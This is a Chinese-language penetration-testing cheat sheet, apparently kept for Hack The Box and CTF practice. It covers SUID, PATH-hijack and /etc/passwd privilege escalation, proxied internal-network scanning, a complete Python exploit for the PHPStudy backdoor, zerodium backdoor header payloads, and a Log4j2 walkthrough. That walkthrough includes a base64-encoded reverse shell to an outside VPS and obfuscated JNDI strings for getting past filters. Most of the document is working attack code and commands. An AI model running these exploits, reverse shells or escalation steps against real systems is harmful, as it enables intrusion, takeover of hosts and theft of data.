渗透

渗透(Hack The Box / HTB)

扫描

  • nmap

    nmap -sC -sV xx.xx.xx.xx -oA src/

    -sC is for using default nmap scripts,

    -sV for enumerating services versions,

    -oA is for output ALL format and specify the directory src,

    NOTICE: you may be adding -Pn if you have an error wait for some time and here is the result.

提权

SUID提权(4000权限)

SUID可以让调用者以文件拥有者的身份运行该文件,所以我们利用SUID提权的思路就是运行root用户所拥有的SUID的文件,那么我们运行该文件的时候就得获得root用户的身份了。

发现系统上运行的所有SUID可执行文件,不同系统适用于不同的命令:

1
2
3
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -print 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;
  • 环境变量提权

    1
    2
    3
    4
    5
    6
    7
    8
    9
    #/home/raj/script/shell具SUID权限
    cd /tmp
    echo “/bin/bash” > ps
    chmod 777 ps
    echo $PATH
    export PATH=/tmp:$PATH
    cd /home/raj/script
    ./shell
    whoami
  • find 提权

    1
    2
    3
    # 普通用户,进入到/tmp目录下,然后新建一个文件
    touch abcd
    find abcd -exec whoami \;
  • /etc/shadow 提权

    1
    xxd "/etc/shadow" | xxd -r
  • /etc/passwd 提权

    1
    2
    3
    4
    5
    cat /etc/passwd>passwd
    echo "test:abRcsZmlrrKFA:0:0:,,,:/root:/bin/bash" >>passwd
    cp passwd /etc/passwd
    python3 -c 'import pty; pty.spawn("/bin/bash")'
    su - test
  • /usr/bin/nl 提权

    nl /flag

  • /usr/bin/date 提权

    1
    2
    # 利用date命令的 -f 参数读取文件
    /usr/bin/date -f /flag
  • 以其他用户运行命令

    sudo -l (查看此用户拥有的特殊权限)

    echo password | su -c userB cat xxx.txt

  • 根目录非root权限

    ls -al / (检查根目录权限是否非root)

    1
    2
    3
    4
    5
    6
    mv bin bin1
    /bin1/mkdir bin
    /bin1/chmod 777 bin
    /bin1/echo "/bin1/cat /flag" > /bin/umount
    /bin1/chmod 777 /bin/umount
    exit

内网渗透

  • 探测内网主机

    1
    for k in $( seq 1 255);do ping -c 1 10.203.113.$k|grep "ttl"|awk -F "[ :]+" '{print $4}'; done
  • 常见端口扫描

    EW代理:./ew_for_linux64 -s ssocksd -l 9999

    扫描:proxychains3 nmap 扫描常见端口

  • 操作

    远程连接数据库:proxychains3 mysql -h 10.203.113.33 -u ctf -p

    启动火狐浏览器:proxychains3 firefox

    远程连接:proxychains3 rdesktop 10.203.113.34:3389

其他

  • PHPStudy 后门漏洞

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    92
    93
    94
    95
    96
    97
    98
    99
    100
    101
    102
    103
    104
    import requests
    import base64
    from random import choice

    USER_AGENTS = [
    "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AcooBrowser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)",
    "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Acoo Browser; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)",
    "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.5; AOLBuild 4337.35; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)",
    "Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)",
    "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 2.0.50727; Media Center PC 6.0)",
    "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 1.0.3705; .NET CLR 1.1.4322)",
    "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.04506.30)",
    "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/523.15 (KHTML, like Gecko, Safari/419.3) Arora/0.3 (Change: 287 c9dfb30)",
    "Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527+ (KHTML, like Gecko, Safari/419.3) Arora/0.6",
    "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2pre) Gecko/20070215 K-Ninja/2.1.1",
    "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9) Gecko/20080705 Firefox/3.0 Kapiko/3.0",
    "Mozilla/5.0 (X11; Linux i686; U;) Gecko/20070322 Kazehakase/0.4.5",
    "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko Fedora/1.9.0.8-1.fc10 Kazehakase/0.5.6",
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.20 (KHTML, like Gecko) Chrome/19.0.1036.7 Safari/535.20",
    "Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; fr) Presto/2.9.168 Version/11.52",
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.11 TaoBrowser/2.0 Safari/536.11",
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.71 Safari/537.1 LBBROWSER",
    "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; LBBROWSER)",
    "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 732; .NET4.0C; .NET4.0E; LBBROWSER)",
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.84 Safari/535.11 LBBROWSER",
    "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)",
    "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; QQBrowser/7.0.3698.400)",
    "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 732; .NET4.0C; .NET4.0E)",
    "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; QQDownload 732; .NET4.0C; .NET4.0E; 360SE)",
    "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 732; .NET4.0C; .NET4.0E)",
    "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)",
    "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1",
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1",
    "Mozilla/5.0 (iPad; U; CPU OS 4_2_1 like Mac OS X; zh-cn) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148 Safari/6533.18.5",
    "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0b13pre) Gecko/20110307 Firefox/4.0b13pre",
    "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:16.0) Gecko/20100101 Firefox/16.0",
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11",
    "Mozilla/5.0 (X11; U; Linux x86_64; zh-CN; rv:1.9.2.10) Gecko/20100922 Ubuntu/10.10 (maverick) Firefox/3.6.10"
    ]
    TIME_OUT=10

    print(r"""
    _____ _ _ _____ _____ _ _ ____ _ _
    | __ \ | | | || __ \ / ____|| | | | | _ \ | | | |
    | |__) || |__| || |__) || (___ | |_ _ _ __| | _ _ | |_) | __ _ ___ | | __ __| | ___ ___ _ __
    | ___/ | __ || ___/ \___ \ | __|| | | | / _` || | | | | _ < / _` | / __|| |/ // _` | / _ \ / _ \ | '__|
    | | | | | || | ____) || |_ | |_| || (_| || |_| | | |_) || (_| || (__ | <| (_| || (_) || (_) || |
    |_| |_| |_||_| |_____/ \__| \__,_| \__,_| \__, | |____/ \__,_| \___||_|\_\\__,_| \___/ \___/ |_|
    __/ |
    |___/
    Usage & e.g. :
    Target Url:
    localhost/flag.php
    Input Your Command:
    phpinfo();
    Notice: Command Must Be PHP Function, If You Want To Execute OS Command, Use: system('YOUR COMMAND');
    By:Sp4ce
    Have Fun
    """)

    def checkTarget(url):
    poc = {
    "Accept-Charset": "cGhwaW5mbygpOw==",
    "Accept-Encoding": "gzip,deflate"
    }
    try:
    pocRequest = requests.get(url, headers=poc,timeout=TIME_OUT)
    if "phpinfo" in str(pocRequest.content):
    print('[+] Target is vulnerable.')
    return True
    else:
    print('[-] Target is NOT vulnerable.')
    return False
    except :
    print('[-] Looks Like Something Wrong.')


    def exploit(url,command):
    headers = {}
    headers['User-Agent'] = choice(USER_AGENTS)
    headers['Accept-Encoding'] = 'gzip,deflate'
    headers['Accept-Charset'] = command
    try:
    request = requests.get(url, headers=headers)
    if request.status_code == 200:
    print('[+] Command Execute Successful.')
    print(request.text)
    else:
    print('[-] Looks Like Something Wrong. Maybe target is NOT vulnerable.')
    except:
    print('[-] Looks Like Something Wrong.\n')


    if __name__ == "__main__":
    while True:
    url = input("Target Url:\n")
    if 'http' not in url:
    url = "http://" + url
    print('[i] Checking Target...')
    if checkTarget(url):
    cmd = input("Input Your Command:\n")
    command = base64.b64encode(cmd.encode('utf-8'))
    exploit(url,command)
  • zerodium 后门

    列目录:User-Agentt: zerodiumsystem('ls /');

    读文件:User-Agentt: zerodiumsystem('cat /flag');

  • log4j2 漏洞(CVE-2021-44228)

    步骤:

    1. 在vps上通过 JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar 启动监听

      1
      2
      3
      java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny54eHgueHh4LjIyMC8yMzMzIDA+JjE=}|{base64,-d}|{bash,-i}" -A "47.xxx.xxx.220"

      # YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny54eHgueHh4LjIyMC8yMzMzIDA+JjE= 为 bash -i >& /dev/tcp/47.xxx.xxx.220/2333 0>&1, 用于反弹shell
    2. 将payload填入找到的漏洞处

      1
      ${jndi:ldap:${sys:file.separator}${sys:file.separator}47.xxx.xxx.220:1389${sys:file.separator}ge5udq}

    参考:Apache Log4j2漏洞复现-反弹shell

    绕过:

    1
    2
    3
    4
    5
    6
    7
    8
    ${jndi:ladp://xxxxxx.dnslog.cn/exp}
    ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://xxxxxx.dnslog.cn/exp}
    ${${::-j}ndi:rmi://xxxxxx.dnslog.cn/exp}
    ${jndi:rmi://xxxxxx.dnslog.cn}
    ${${lower:jndi}:${lower:rmi}://xxxxxx.dnslog.cn/exp}
    ${${lower:${lower:jndi}}:${lower:rmi}://xxxxxx.dnslog.cn/exp}
    ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://xxxxxx.dnslog.cn/exp}
    ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://xxxxxx.dnslog.cn/exp}